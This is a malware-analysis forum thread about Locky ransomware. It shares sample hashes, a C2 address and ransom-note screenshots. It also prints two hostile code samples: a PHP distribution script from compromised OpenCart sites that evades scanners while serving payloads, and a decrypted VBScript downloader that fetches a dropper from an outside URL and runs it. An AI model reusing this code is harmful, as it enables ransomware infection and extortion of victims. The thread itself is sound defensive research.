A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28170  by patriq
 Fri Apr 01, 2016 12:40 am
Sample from Distribution Site
https://ransomwaretracker.abuse.ch/host ... lebox.com/

https://www.virustotal.com/en/file/003d ... /analysis/

I'm seeing it POST to 185.75.46.4/submit.php now
https://ransomwaretracker.abuse.ch/ip/1 ... 5.75.46.4/
(listed as offline now?)

Ransom note
_HELP_instructions.gif
_HELP_instructions.gif (46.33 KiB) Viewed 1111 times
Payment:
paymentscreenshot.png
paymentscreenshot.png (111.55 KiB) Viewed 1111 times
Attachments
(101.23 KiB) Downloaded 132 times
 #28276  by rkhunter
 Mon Apr 11, 2016 10:51 am
Locky ransomware, TeslaCrypt & other malware families use new tool to evade detection

http://researchcenter.paloaltonetworks. ... detection/

Locky sample in attach.
SHA-256: 4b9a525a80cdba0d827b52d1e19c0b74e055b9afacfa2910dd32230826f91a7a
Attachments
pass:infected
(99.84 KiB) Downloaded 124 times
 #28301  by benkow_
 Wed Apr 13, 2016 1:27 pm
Example of script used to spread Locky (hosted on compromised OpenCart with url pattern: XXX.com/image/flags/.../40X.php?f=XXX)
Code: Select all
<?php
error_reporting(0);
$file = isset($_GET['f']) ? $_GET['f'] : "";
 
if (file_exists($file)) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $geoPlugin_array = unserialize( file_get_contents('http://www.geoplugin.net/php.gp?ip=' . $ip) );
    $c_name = $geoPlugin_array['geoplugin_countryName'];
    $c_code = $geoPlugin_array['geoplugin_countryCode'];
 
    if (0 === strpos($c_code, "CN")) exit;
    if (0 === strlen($ua)) exit;
    if (strpos(file_get_contents($file.".stats_ip.txt"), "IP:".$ip) !== false) exit;
    if (0 === strpos($ip, "173.245.81.")) exit;
    if (false !== strpos($ua, "virustotal")) exit;
 
    file_put_contents($file.".stats.txt", "DATE:".date("Y-m-d H:i:s")."\tIP:".$ip."\tCOUNTRY:(".$c_code.")".$c_name."\tUA:".$ua."\tREF:".$_SERVER['HTTP_REFERER']."\n", FILE_APPEND);
    file_put_contents($file.".stats_ip.txt", "IP:".$ip."\n", FILE_APPEND);
 
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
}
exit;
?>
 #28435  by Antelox
 Fri Apr 29, 2016 1:10 pm
Found inside Locky JS Downloader! =)
inside_locky_js_downloader.jpg
inside_locky_js_downloader.jpg (23.52 KiB) Viewed 828 times
BR,

Antelox
 #28486  by frank_boldewin
 Wed May 11, 2016 7:39 pm
Just analysed a new way Locky tries to install on systems. Very small zip-files (<1000 Bytes), after unzipping there's a rar-file and inside this one a .vbe (encrypted .vbs file).
The vbs file tries to download and run a locky dropper.

Several AV-Scanners suck to detect this.

Encrypted .vbe file
Code: Select all
'**LE9Cu2HlEvfKIPN**#@~^TwAAAA==@#@&L4Tq~|SkN,xPrtOYa)&&mxYb5E/O(r8VR1WhzA2 kUm^;N/&^DYrWbmCYdJ.{GLREJ@#@&URkAAA==^#~@ 
'**LE9Cu2HlEvfKIPN**#@~^bQIAAA==@#@&tn_KGs9_.mdP{PEyX6^a.my$dNm/RarWJ,@#@&joL4-kl4N6VfG\~x,ZDnCD+64Nn1YcrUmDbwD ?4+sVr# 3Xwl	[2	\kMGU:xD?ODrUT/cJuO+swYE*@#@&ioNt-/m490VGf7P',jw%t7/Ct90V9G\PL~J'J@#@&[r:,x	|$1F^m/lPUnY,xUF~1|^CkPxP1.lOW(L+1YvEHbm.WkWWOc(HduK:nJ*@#@&Nb:,m^Mo9_?9m1d),?nO,mm!oGCjf1^kPx,mM+lD+K8LmO`rb[G94RUODl:rb@#@&	xnAH|^CkR6wUPrM3Pr~P%4Tq$|dd9~~wl^/+@#@&	U|~1Fmm/ jxN@#@&hbYt,^^Mwf_?9m^d@#@&~P,~RDX2n,'Pq~@#@&~P,~cW2x@#@&P,P, hMkO+,xUF~1|1C/cD+k2Gxk+~W[X@#@&,P~Pcdl7+OG6kVn~`s%t7dmt[63Gf\,[,~tCPfw9u#m/~,+P@#@&+	[~hbY4@#@&?nO,t[KIojkl[[1P'~/M+CY6(Ln1YvJ?4+^sRzw2VbmCObWxrbP@#@&t9Pes`/mN[m 6a+UP`oL4\dC4N0V9G\~[,4CPGsxC.m/@#@&E7sAAA==^#~@ 
Decrypted:
Code: Select all
jhgIBKLsd = "http://antiques-bible.com/wp-includes/certificates/V7Dj8u"

heHTDFJHVas = "zxxcxzczqsdas.pif"
UFjhvsahdfkDDv = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
UFjhvsahdfkDDv = UFjhvsahdfkDDv & "\"
dim nnKBNKcas: Set nnKBNKcas = createobject("Microsoft.XMLHTTP")
dim ccGFDHSDccs: Set ccGFDHSDccs = createobject("Adodb.Stream")
nnKBNKcas.Open "GET", jhgIBKLsd, False
nnKBNKcas.Send
with ccGFDHSDccs
    .type = 1
    .open
    .write nnKBNKcas.responseBody
    .savetofile UFjhvsahdfkDDv &  heHTDFJHVas, 2
end with
Set hdTYFUsaddc = CreateObject("Shell.Application")
hdTYFUsaddc.Open UFjhvsahdfkDDv & heHTDFJHVas
Dropper attached!
Attachments
pw: malware
(181.46 KiB) Downloaded 107 times
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 15